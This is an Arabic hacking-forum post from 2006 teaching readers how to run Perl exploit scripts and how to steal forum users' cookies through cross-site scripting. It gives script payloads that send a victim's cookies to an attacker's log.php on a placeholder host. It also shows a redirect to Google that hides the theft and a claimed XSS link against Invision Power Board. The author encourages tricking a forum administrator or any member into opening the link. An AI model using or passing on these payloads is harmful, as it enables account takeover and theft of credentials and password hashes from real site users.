الموضوع: اخر موضوعاتى : تعليم الاختراق الاحترافى . حصريا !!
عرض مشاركة واحدة
  #6  
قديم 04-07-2006, 05:17 PM
الصورة الرمزية Xx.Youri.xX
Xx.Youri.xX Xx.Youri.xX غير متواجد حالياً
عضو قدوة
  
تاريخ التسجيل: Jul 2005
العمر: 18
المشاركات: 1,536
معدل تقييم المستوى: 0
Xx.Youri.xX is an unknown quantity at this point
افتراضي

اولا . الثغرات زى ما قلت انواع كثيره .

اولا نوع الperl

وده اسهل نوع محتاج فى التعامل معاها بنظام الويندوز برنامج ال perl انا واضح لينك التحميل له فى موضوع اختراق منتدى ثانويه فى هذا القسم ..

وشارح كمان طريقه الاستغلال .


هتقولى انا لسه هدور .

الشرح ببساطه .

الاول محتاج برنامج ال activeperl للتحميل من هنا http://downloads.activestate.com/ActivePer...15-MSWin32-x86-

بتعرف ان الثغره من نوع البيرل من اول سطر هتلاقى مكتوب فيه الكلمه دى . #!/usr/bin/perl

وبعدكده انت بتستخدم الاوامر اللى مكتوبه عندك مش هتخترع كتير يعنى .

perl expl.pl

لمعرفه الامر اللى يمكنك استخدامها لاسستغلال الثغره اللى فى الملف expl.pl



. النوع الثانى من الثغرات .. ثغرات ال xss

طيب نأتي الان الى الكود المهم في ثغرات xss

هذا كود سكربت خبيث يأتي بمعلومات الكوكيز تجده دائما ً في ثغرات xss
<script>javascript:alert(****************)</Script>

الأن الكود هذا لم يكون بالثغره سوف يظهر لك الكوكيز تبعك وهو يحتوي على نقاط مهمه وهي :
1- رقم العضويه
2- الباسورد مشفر md5
3 - الباسورد مشفر Hash

ورقم الاستايل وغيره ,, على حسب نوعيه البرنامج المصاب!

طيب الحين وجدت هذا الكود سوف نربطه باللوج

ماهو اللوج ؟
اللوج هذا تربطه مع السكربت الذي ياتي بالكوكيز ,, وبعد ان تربطه كل من فتح السكربت وهو مربوط باللوج سوف يسجل معلومات الكوكيز تبعه باللوج او يرسل الى ايميلك ( على حسب اللوج )

طيب الان بعد ما ربطته اصبح الرابط :
<script>location.href="http://www.xxxxx.com/log.php?id="+****************</Script>

تمام الان :
www.xxx.com = الموقع المربوط فيه اللوج
log.php = اسم ملف اللوج
طيب الحين نرفع اللوج على اي موقع عندك وبعد كذا تستبدل
www.xxx.com/log.php برابط اللوج الي عندك

المهم الان هذا السكربت اصبح جاهزا للاستعمال سوف نضعه بكود الثغره ونستبدل :


<script>javascript:alert(****************)</Script>
بـ
<script>location.href="http://www.xxxxx.com/log.php?id="+****************</Script>

الان نخلي مثلا المدير العام او اي عضو تبي تسرق الكوكيز تبعه انه يفتح الرابط

بتقول كيف بقولك ياااولد انت وراااااسك(6) عاد بطريقتك خليه يفتح الرابط

طيب الحين بتقولي والله فضيحه يابو خالد لم اخليه يفتح الرابط يطلع عنده اللوج وبيكشفني

بقوله ولا يهمك اخوي نربطه كمان بموقع للتمويه

مثلا نربطه بموقع www.google.com بحيث انه لم يفتح الثغره والمربوط فيها اللوج وموقع جوجل راح يتحول اوتوماتيك الى جوجل وبكذا مايشك

بتقول كيف يابو خالد بقولك كذا نضع بعد رابط اللوج :
re=www.google.com&
بس
بحيث يكون بعد & يوجد id ... الخ
يعني يكون الكود :

:
<script>location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+****************</Script>

طبعا انت استبدل www.google.com باي موقع تبغاه ويفضل يكون الموقع الي مصاب فيه الثغره (1)

طيب الحين تقول كذا تمام يابو خالد يالله عطنا مثااال

بعطيكم مثال لثغره الي اكتشفتها انا بمنتديات :Invision Power Board

الكود للثغره :
http://xxx.com/forums/index.php?act=idx=&#...</script>
احنا راح نستبدل :

<script>javascript:alert(****************)</Script>

بـ

ود PHP:
<script>location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+****************</Script>

واستبدل هنا موقع جوجل باي موقع تانى انت عايزه

ورابط اللوج www.xxx.com/log.php باللوج تبعك


__________________
Nobody gets too much heaven no more, itz much harder to come by
Nobody gets too much love no more, But I
..:: ^^ Youri <33's Jaleesz ^^ ::..
* quote from Dusty * Like jaleesz is a lovely dovey stuffs, isnt she